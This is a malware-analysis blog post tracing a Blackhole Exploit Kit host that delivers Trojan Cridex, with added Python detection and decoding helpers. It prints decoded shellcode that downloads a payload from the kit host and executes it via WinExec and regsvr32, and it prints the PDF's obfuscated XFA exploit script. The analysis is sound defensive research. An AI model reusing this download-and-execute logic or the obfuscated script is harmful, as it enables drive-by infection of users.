I think I have been careful enough in monitoring it, so I don't think they even sense that they are being monitored, which has given me plenty of time to analyze it. Here's what I found...
Background

The spam email containing a malicious link to this host on Sept 5th was what made me start monitoring this host.

So the moral of the story is: with BHEK infector domains lasting a maximum of 2 days, with landing pages changing per click on BHEK2 and hourly on the previous version, and with them now using network tools for protection and C&C deployment, we have a strong opponent that we mustn't ignore.

Maybe some of you still remember this spam:

From: HM Revenue & Customs [mailto:refund.request@hmrc.gov.uk]
To: xxxx
Sent: 05 September 2012 xx:xx (time varied)
Subject: Tax Refund Alert - Action Required

How to complain, ask for a review or make an appeal
Review process update
Review process - the first 12 months. Find out more
Claim Your Tax Refund Online
We identified an error in the [link]

↑ This spam actually infected users with Cridex. At that time the domains used were gdeounitrg.com and gsigallery.net.

URLQuery data also shows a long list of reported malware infectors coming from this host; you can access it here --->> [CLICK]

From that list ↑ we can see the recent infector domains, as below ↓

virtual-geocaching.net
cedarbuiltok.net
thebummwrap.net
afgreenwich.net
bode-sales.net
cat-mails.net
centennialfield.net
blue-lotusgrove.net
dushare.net

If you look at each report listed in ↑ URLQuery by date, you will see that this host never uses the same domain for more than 2 days (MAX). Since the URLs listed are landing pages, I can assume an email malvertising scheme.
Services used:

During the initial monitoring period I detected the services below:

21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
136/tcp open profile
137/tcp open netbios-ns
138/tcp open netbios-dgm
139/tcp open netbios-ssn
389/tcp open ldap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
5050/tcp open mmcc
8009/tcp open ajp13
8080/tcp open http-proxy

A couple of days ago I realized they had filtered some of the previously open ports/services, and added some more too, so it now looks like this:

21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc <----- 1
136/tcp filtered profile <----- 1
137/tcp filtered netbios-ns <----- 1
138/tcp filtered netbios-dgm <----- 1
139/tcp filtered netbios-ssn <----- 1
389/tcp open ldap
445/tcp filtered microsoft-ds <----- 1
636/tcp open ldapssl
1025/tcp filtered NFS-or-IIS <----- 1
1337/tcp filtered waste
3001/tcp filtered nessusd <----- 2
3128/tcp filtered squid-http <----- 3
5000/tcp filtered UPnP
5050/tcp open mmcc
8009/tcp open ajp13
8080/tcp open http-proxy <----- 4

Legend:
1 = Windows services; these were never filtered previously
2 = nessus scanner daemon service
3 = squid proxy is running
4 = http web server

↑ They filtered some TCP ports related to the Windows services.
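Re-checking a host's port state every day, as described above, is easier to keep up when the comparison is automated. The script below is an added example (not part of the original post); the two port lists are copied from the scans above, and the line format it parses is the plain "port/proto state service" form shown there. It reports ports that appeared, disappeared, or changed state, which is exactly the signal that the Windows ports had been filtered and that nessus and squid ports had shown up.

```python
import re
from typing import Dict, List, Tuple

# Port-state lines copied from the two scans in the post above
# (first scan vs. the scan a couple of days later); the legend arrows
# are dropped so that every line has the same shape.
SCAN_BEFORE = """\
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
135/tcp open msrpc
136/tcp open profile
137/tcp open netbios-ns
138/tcp open netbios-dgm
139/tcp open netbios-ssn
389/tcp open ldap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
5000/tcp open UPnP
5050/tcp open mmcc
8009/tcp open ajp13
8080/tcp open http-proxy
"""

SCAN_AFTER = """\
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
111/tcp open rpcbind
135/tcp filtered msrpc
136/tcp filtered profile
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
389/tcp open ldap
445/tcp filtered microsoft-ds
636/tcp open ldapssl
1025/tcp filtered NFS-or-IIS
1337/tcp filtered waste
3001/tcp filtered nessusd
3128/tcp filtered squid-http
5000/tcp filtered UPnP
5050/tcp open mmcc
8009/tcp open ajp13
8080/tcp open http-proxy
"""

# "port/proto state service", as nmap prints it
PORT_LINE = re.compile(r"^\s*(\d+)/(tcp|udp)\s+(open|closed|filtered)\s+(\S+)")


def parse_scan(text: str) -> Dict[Tuple[int, str], Tuple[str, str]]:
    """Map (port, proto) -> (state, service) from nmap-style port lines."""
    ports = {}
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            ports[(int(m.group(1)), m.group(2))] = (m.group(3), m.group(4))
    return ports


def diff_scans(before: str, after: str) -> Dict[str, List[tuple]]:
    """Report ports that appeared, disappeared or changed state between two scans."""
    old, new = parse_scan(before), parse_scan(after)
    report = {"added": [], "removed": [], "changed": []}
    for key in sorted(set(old) | set(new)):
        port = key[0]
        if key not in old:
            report["added"].append((port, new[key][0], new[key][1]))
        elif key not in new:
            report["removed"].append((port, old[key][0], old[key][1]))
        elif old[key][0] != new[key][0]:
            report["changed"].append((port, old[key][0], new[key][0], new[key][1]))
    return report


if __name__ == "__main__":
    for kind, rows in diff_scans(SCAN_BEFORE, SCAN_AFTER).items():
        for row in rows:
            print(kind, *row)
```

Run daily against saved scan output, the "changed" rows show the open-to-filtered transitions on 135-139/1025/5000 and the "added" rows surface 445, 1337, 3001 and 3128 without reading the two lists side by side.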
To make sure this is still the same Windows server as before, I re-checked its OS fingerprint every day:

Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW

What about the web services used (ports 80 and 8080)? Let's see what happens on port 8080:

GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net:8080
Accept: */*

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1 <---- here
Accept-Ranges: bytes
ETag: W/"7777-1279522786000"
Last-Modified: Mon, 19 Jul 2010 06:59:46 GMT
Content-Type: text/html
Content-Length: 7777
Date: Tue, 18 Sep 2012 08:48:01 GMT

While this is what happens on port 80:

GET / HTTP/1.1
User-Agent: blah
Host: virtual-geocaching.net
Accept: */*

HTTP/1.1 403 Forbidden
Server: nginx/1.3.3 <--- here
Date: Tue, 18 Sep 2012 08:51:49 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 202
Connection: close

↑ So on TCP/8080 we see Tomcat, and nginx on TCP/80. Now we have nginx, Apache, file sharing, telnet, ssh and ftp servers. The filtered ports are nessus, for port scanning, and a squid proxy, which I probed and found to be set outbound. I have seen some Blackhole hosts, but never a guarded one with heavy services running like this; moreover, NFS and LDAP services are also running, which suggests the possibility of record-keeping or maybe C&C activity on it.

OK, let's continue with what this BHEK actually does now..

Infector scheme and malwares

Consulting my EK mentor @kafein, who kindly guides me in EK infection cases: this looked like an old version of BHEK (1.2.5), but since there are some changes it has possibly been upgraded to the latest BHEK v2, so I used a tool on a FreeBSD box to check the infector scheme. We picked the latest infector structure from urlQuery:

virtual-geocaching.net/main.php?page=7de3f5c4200c896e..

And this is what I fetched as samples:

↑ All of this evil mess is what a user will get by clicking the one infector URL above.
File details are as follows (file name, MD5, size in bytes):

AcroPDF.PDF  50583375d345fb7a294e26094601699a  18406
field.swf  d41d8cd98f00b204e9800998ecf8427e  0
Gam.jar  ab4af9072132f170024a9072e0288459  32171
main.php@page=7de3f5c4200c896e  de277f4802b1b59bb2d0f2cafb3137a3  69023
shellcode.sc  ac157a90724aec74a1de6e0a20d4db0d  466
wpbt0.dll/e88d779.exe  3158bc97bf424fcd905caa22b29767b9  119143

These come through the redirected URLs of the infector, below:

/main.php?page=7de3f5c4200c896e <-- JS/Obfs infector
/Gam.jar <----- Java exploit CVE-2012-1723/CVE-2012-4681 w/ shellcode
/data/ap2.php <---- PDF malware Pdfka/EXP with shellcode
/w.php?f=80f39&e=1 <---- payload EXE (Troj/CRIDEX dropped by JS/HTML shellcode)
/w.php?f=80f39&e=2 <----- payload EXE (Troj/CRIDEX dropped by PDF)
/data/hhcp.php?c=80f39 <---- 0 bytes (link for SWF)
/data/field.swf <-- 0 bytes, supposed to be Flash/Shockwave
/w.php?f=80f39&e=4 <--- URL dropped by the PDF shellcode

↑ The point of this scheme is to infect the user with Trojan/Cridex. The infector scheme is as follows: the landing page is HTML containing obfuscated JS code; a neutralized sample is here ---->> [PASTEBIN]. This code, deobfuscated, looks like this ---->> [PASTEBIN]. There you can see the BHEK plugin-detection code that exploits your browser through whichever component is vulnerable, along the routes below:

Java Object (Gam.jar) --> shellcode1 --> Troj/Cridex (PE)
PDF File (AcroPDF.PDF) --> shellcode2 --> Troj/Cridex (PE)
DOMDocs Msxml2.XMLHTTP --------> Troj/Cridex (PE)
Java Exploit javaplugin.191_40 --> shellcode1 --> Troj/Cridex (PE)
JavaWebStart.isInstalled --> shellcode1 --> Troj/Cridex (PE)
SWF Exploit (field.swf) --> null (at least at this moment..)
Landing page itself/HTML --> shellcode1 --> Troj/Cridex (PE)

The above scheme was recorded in the log on my FreeBSD box, below:

[h00p] URL: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e (Status: 200, Referrer: None)
[Navigator URL Translation] Gam.jar --> h00p://virtual-geocaching.net/Gam.jar
[h00p] URL: h00p://virtual-geocaching.net/Gam.jar (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving applet Gam.jar
[Window] Eval argument length > 64 (33842)
ActiveXObject: msxml2.xmlh00p
ActiveXObject: acropdf.pdf
Unknown ActiveX Object: shockwaveflash.shockwaveflash.15
Unknown ActiveX Object: shockwaveflash.shockwaveflash.14
Unknown ActiveX Object: shockwaveflash.shockwaveflash.13
Unknown ActiveX Object: shockwaveflash.shockwaveflash.12
Unknown ActiveX Object: shockwaveflash.shockwaveflash.11
ActiveXObject: shockwaveflash.shockwaveflash.10
Unknown ActiveX Object: javawebstart.isinstalled.1.9.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.9.0.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.1.0
Unknown ActiveX Object: javawebstart.isinstalled.1.8.0.0
ActiveXObject: javawebstart.isinstalled.1.7.1.0
Unknown ActiveX Object: javaplugin.171_40
Unknown ActiveX Object: javaplugin.171_39
Unknown ActiveX Object: javaplugin.171_38
Unknown ActiveX Object: javaplugin.171_37
Unknown ActiveX Object: javaplugin.171_36
Unknown ActiveX Object: javaplugin.171_35
Unknown ActiveX Object: javaplugin.171_34
Unknown ActiveX Object: javaplugin.171_33
Unknown ActiveX Object: javaplugin.171_32
Unknown ActiveX Object: javaplugin.171_31
ActiveXObject: javaplugin.171_30
ActiveXObject: javawebstart.isinstalled.1.7.1.0
[Navigator URL Translation] ./data/ap2.php --> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 -->
h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
ActiveXObject: D27CDB6E-AE6D-11CF-96B8-444553540000
[h00p] URL: h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at h00p://virtual-geocaching.net/w.php?f=80f39&e=1 (MD5: 3158bc97bf424fcd905caa22b29767b9)
[Navigator URL Translation] ./data/ap2.php --> h00p://virtual-geocaching.net/data/ap2.php
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/ap2.php
[h00p] URL: h00p://virtual-geocaching.net/data/ap2.php (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] ./data/hhcp.php?c=80f39 --> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[iframe redirection] h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e -> h00p://virtual-geocaching.net/data/hhcp.php?c=80f39
[h00p] URL: h00p://virtual-geocaching.net/data/hhcp.php?c=80f39 (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
[Navigator URL Translation] data/field.swf --> h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)
Saving remote content at data/field.swf (MD5: d41d8cd98f00b204e9800998ecf8427e)
[Navigator URL Translation] data/field.swf --> h00p://virtual-geocaching.net/data/field.swf
[h00p] URL: h00p://virtual-geocaching.net/data/field.swf (Status: 200, Referrer: h00p://virtual-geocaching.net/main.php?page=7de3f5c4200c896e)

About the #shellcode: we found 2 shellcodes, one coded in the landing page and the other coded in the PDF file; call them shellcode 1 and 2.
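The request chain logged above is the part of this kit that stays stable while the domain rotates every day or two, so proxy-log detection should key on the path and query shapes rather than on the host name. The following is an added example, not code from the post: the indicator list is built from the URL structure recorded above (main.php?page=<16 hex>, w.php?f=<hex>&e=<digit>, data/ap2.php, data/hhcp.php?c=<hex>, data/field.swf, and the campaign-specific Gam.jar), the log format is a constructed "time client method url status" layout, and the sample log lines are constructed, with two look-alike requests included to show why the query-string checks matter.

```python
import re
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlsplit

# (tag, path pattern, query pattern or None) derived from the request chain in the post.
# Hosts rotate within two days, so nothing here depends on the domain.
BHEK_INDICATORS = [
    ("bhek-landing", re.compile(r"^/main\.php$"), re.compile(r"^page=[0-9a-f]{16}$")),
    ("bhek-payload", re.compile(r"^/w\.php$"), re.compile(r"^f=[0-9a-f]+&e=\d$")),
    ("bhek-pdf", re.compile(r"^/data/ap2\.php$"), None),
    ("bhek-swf-stager", re.compile(r"^/data/hhcp\.php$"), re.compile(r"^c=[0-9a-f]+$")),
    ("bhek-swf", re.compile(r"^/data/field\.swf$"), None),
    ("bhek-jar", re.compile(r"^/Gam\.jar$"), None),   # file name seen in this campaign only
]

# Constructed proxy log: "time client method url status". The first five lines replay
# the chain from the post; the last three are benign look-alikes.
SAMPLE_LOG = """\
2012-09-18T08:48:01 10.0.0.5 GET http://virtual-geocaching.net/main.php?page=7de3f5c4200c896e 200
2012-09-18T08:48:02 10.0.0.5 GET http://virtual-geocaching.net/Gam.jar 200
2012-09-18T08:48:03 10.0.0.5 GET http://virtual-geocaching.net/data/ap2.php 200
2012-09-18T08:48:04 10.0.0.5 GET http://virtual-geocaching.net/w.php?f=80f39&e=1 200
2012-09-18T08:48:05 10.0.0.5 GET http://virtual-geocaching.net/data/hhcp.php?c=80f39 200
2012-09-18T08:49:10 10.0.0.7 GET http://example.com/main.php?page=about 200
2012-09-18T08:49:11 10.0.0.7 GET http://example.com/w.php?f=readme&e=1 200
2012-09-18T08:49:12 10.0.0.8 GET http://example.com/index.html 200
"""


def classify_url(url: str) -> Optional[str]:
    """Return the indicator tag matching this URL's path/query, or None."""
    parts = urlsplit(url)
    for tag, path_re, query_re in BHEK_INDICATORS:
        if path_re.match(parts.path) and (query_re is None or query_re.match(parts.query)):
            return tag
    return None


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Yield (client, host, tag) for every log line whose URL matches an indicator."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue                      # malformed line, skip
        url = fields[3]
        tag = classify_url(url)
        if tag:
            hits.append((fields[1], urlsplit(url).hostname or "", tag))
    return hits


def infected_clients(hits: List[Tuple[str, str, str]]) -> Set[str]:
    """Clients that fetched both a landing page and a payload stage: treat as likely infected."""
    by_client: Dict[str, Set[str]] = {}
    for client, _host, tag in hits:
        by_client.setdefault(client, set()).add(tag)
    return {c for c, tags in by_client.items() if {"bhek-landing", "bhek-payload"} <= tags}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for client, host, tag in found:
        print(client, host, tag)
    print("likely infected:", sorted(infected_clients(found)))
```

A single landing-page hit is worth a look, but a client that also pulled the w.php payload has completed the chain and should be handled as an infection rather than a blocked attempt.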
Shellcode 1, decoded:

BOOL VirtualProtectEx (
  HANDLE = 0x298dda60 => none;
  LPCVOID = 0x298dda70 => none;
  DWORD dwSize = 255;
  DWORD flNewProtect = 64;
  PDWORD lpflOldProtectt = 64;
) = 0x1;
HMODULE LoadLibraryA (
  LPCTSTR = 0x298ddad0 => = "urlmon"; // urlmon.dll used
) = 0x7df20000;
DWORD GetTempPathA (
  DWORD nBufferLength = 248;
  LPTSTR = 0x298ddb00 => = "c:\tmp\";
) = 0x7;
HRESULT URLDownloadToFile ( // downloads...
  LPUNKNOWN = 0x28621a40 => none;
  LPCTSTR = 0x28621a48 => = "h00p://virtual-geocaching.net/w.php?f=80f39&e=1";
  LPCTSTR = 0x298ddb50 => = "c:\tmp\wpbt0.dll"; // saved here...
  DWORD dwReserved = 0;
  LPBINDSTATUSCALLBACK lpfnCB = 0;
) = 0x0;
UINT WINAPI WinExec ( // execute it here..
  LPCSTR = 0x298ddb70 => = "c:\tmp\wpbt0.dll";
  UINT uCmdShow = 0;
) = 0x20;
UINT WINAPI WinExec (
  LPCSTR = 0x298ddbb0 => = "regsvr32 -s c:\tmp\wpbt0.dll"; // register it...
  UINT uCmdShow = 0;
) = 0x20;
BOOL TerminateThread (
  HANDLE hThread = -2; // exit...
  DWORD dwExitCode = 0;
) = 0x0;

Shellcode 2 is very similar, but aims at a different download URL:

68 74 74 70 3A 2F 2F 76 69 72 74 75 61 6C 2D 67 65 6F 63 61 63 68 69 6E 67 2E 6E 65 74 2F 77 2E 70 68 70 3F 66 3D 38 30 66 33 39 26 65 3D 34 00 00

Means: "h00p://virtual-geocaching.net/w.php?f=80f39&e=4"

As for the PDF infector, most scanners cannot detect the evil script written in it, shown below:

<xfa:script contentType='application/x-javascript'>
with(event){
  e=target["eval"];
  if((app.addMenuItem+"").indexOf("Me"+"nuItem")!=-1){a=target.subject;}
}
a=a.split(".");
s="";
z=a;
for(i in a){ zz=i; }
for(i=0;i<zz;i++){ s+=String.fromCharCode(-33+1*z[i]); }
e(""+s);
</xfa:script>

↑ While the Subject object contains the exploit and shellcode:

<</Subject(130.145.145.79.130.141.134.147.149.94.134
77.65.133.133.133.77.65.134.134.134.77.65.135.135.13 // exploit
92.151.130.147.65.128.141.82.94.67.85.132.83.81.87.8
1.81.81.81.81.81.81.81.81.81.81.81.81.82.83.84.90.89
.92.80.136.77.72.72.74.92.151.130.147.65.128.141.83.
1.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81.81
141.130.132.134.73.80.92.80.136.77.72.72.74.92.128.1
: snip :
CreationDate(66;83;e4;fc;fc;85;e4; // shellcode
;08;c1;cb;0d;03;da;40;eb;f1;3b;1f;
;05;ff;e3;68;6f;6e;00;00;68;75;72;
;c1;04;30;88;44;1d;04;41;51;6a;00; ...blah

The payload itself is the PE file of Trojan/Cridex, which has the analysis below:

Sample's MD5: 3158bc97bf424fcd905caa22b29767b9

0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..

Compile Time: 2012-09-18 02:55:38
CRC Fail: Claimed: 0 Actual: 130407
Packer: PureBasic 4.x -> Neil Hodgson

Sections (name, virtual address, virtual size, raw size):
.code 0x1000 0x24cf 9728
.text 0x4000 0x23c8 9216
.rdata 0x7000 0x10 512
.data 0x8000 0xa8c 1536

Drops:
%Appdata%\kb00085031.exe (payload)
%Temp%\exp1.tmp
%temp%\exp1.tmp.bat

Collects information:
HKLM\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (TransparentEnabled)
HKLM\System\CurrentControlSet\Control\Terminal Server (TSUserEnabled)

At the time I got this, only 3 AV products detected it:

Symantec: W32.Cridex
McAfee-GW-Edition: Heuristic.BehavesLike.Win32.Downloader.A
Comodo: TrojWare.Win32.Trojan.Agent.Gen

I uploaded the samples to VirusTotal to check/monitor the RECENT detection ratio:
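Two of the artifacts above can be checked by hand from what is printed on the page, and the following is an added example (my code, not the post's or any tool's) that does both. The first function re-implements the XFA script's decoding of the /Subject string in Python, including its quirk that the loop bound `zz` is the last index, so the final token is never decoded; fed the opening tokens of the Subject dump above, it yields the start of the exploit's JavaScript. The second reads the DOS and COFF headers out of the hexdump of the Cridex sample (copied from the post) and recovers the section count, the link-time timestamp and SizeOfCode; converting the timestamp shows that the "Compile Time" line in the report is the UTC value shifted by +9 hours, i.e. the tool printed local time. The JST conversion is my assumption about the reporting tool's time zone, the 0xA0-byte hexdump is all this needs.

```python
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict


def decode_subject(subject: str) -> str:
    """Replay the PDF's XFA decoder: each dot-separated token is a char code + 33.

    The script sets zz to the last index via `for(i in a){zz=i;}` and then loops
    `for(i=0;i<zz;i++)`, so the last token is skipped; that behaviour is kept here.
    """
    tokens = subject.split(".")
    out = []
    for tok in tokens[:-1]:
        try:
            code = int(tok.strip()) - 33          # JS: -33 + 1*z[i]
        except ValueError:
            code = 0                              # JS: fromCharCode(NaN) -> "\0"
        out.append(chr(code % 0x10000))           # fromCharCode wraps to 16 bits
    return "".join(out)


# First 0xA0 bytes of the Cridex sample, copied from the hexdump in the post.
HEXDUMP = """\
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 04 00 1A 64 57 50 00 00 00 00 PE..L....dWP....
0090 00 00 00 00 E0 00 0F 01 0B 01 02 32 00 4A 00 00 ...........2.J..
"""


def hexdump_to_bytes(dump: str) -> bytes:
    """Rebuild raw bytes from 'offset 16-hex-bytes ascii' lines (ASCII column ignored)."""
    data = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        if len(fields) < 17:
            continue
        data.extend(int(h, 16) for h in fields[1:17])
    return bytes(data)


def parse_pe_head(data: bytes) -> Dict[str, object]:
    """Read e_lfanew, the COFF header and the first optional-header fields."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsect, stamp, _symtab, _nsyms, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    # IMAGE_OPTIONAL_HEADER starts 24 bytes after the signature: Magic, linker ver, SizeOfCode
    magic, _lmaj, _lmin, size_of_code = struct.unpack_from("<HBBI", data, e_lfanew + 24)
    fmt = "%Y-%m-%d %H:%M:%S"
    utc = datetime.fromtimestamp(stamp, tz=timezone.utc)
    return {
        "e_lfanew": e_lfanew,
        "machine": machine,
        "sections": nsect,
        "timestamp": stamp,
        "characteristics": chars,
        "pe32": magic == 0x10B,
        "size_of_code": size_of_code,
        "compiled_utc": utc.strftime(fmt),
        # assumption: the report's tool printed local time; UTC+9 reproduces its figure
        "compiled_utc9": utc.astimezone(timezone(timedelta(hours=9))).strftime(fmt),
    }


if __name__ == "__main__":
    print(repr(decode_subject("130.145.145.79.130.141.134.147.149.94.134")))
    for k, v in parse_pe_head(hexdump_to_bytes(HEXDUMP)).items():
        print(k, hex(v) if isinstance(v, int) and not isinstance(v, bool) else v)
```

SizeOfCode comes out as 18944, which is the sum of the .code and .text raw sizes listed above (9728 + 9216), and NumberOfSections is 4, matching the four sections in the report; when a hexdump and a tool report disagree on such values, the bytes win.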
#MalwareMustDie!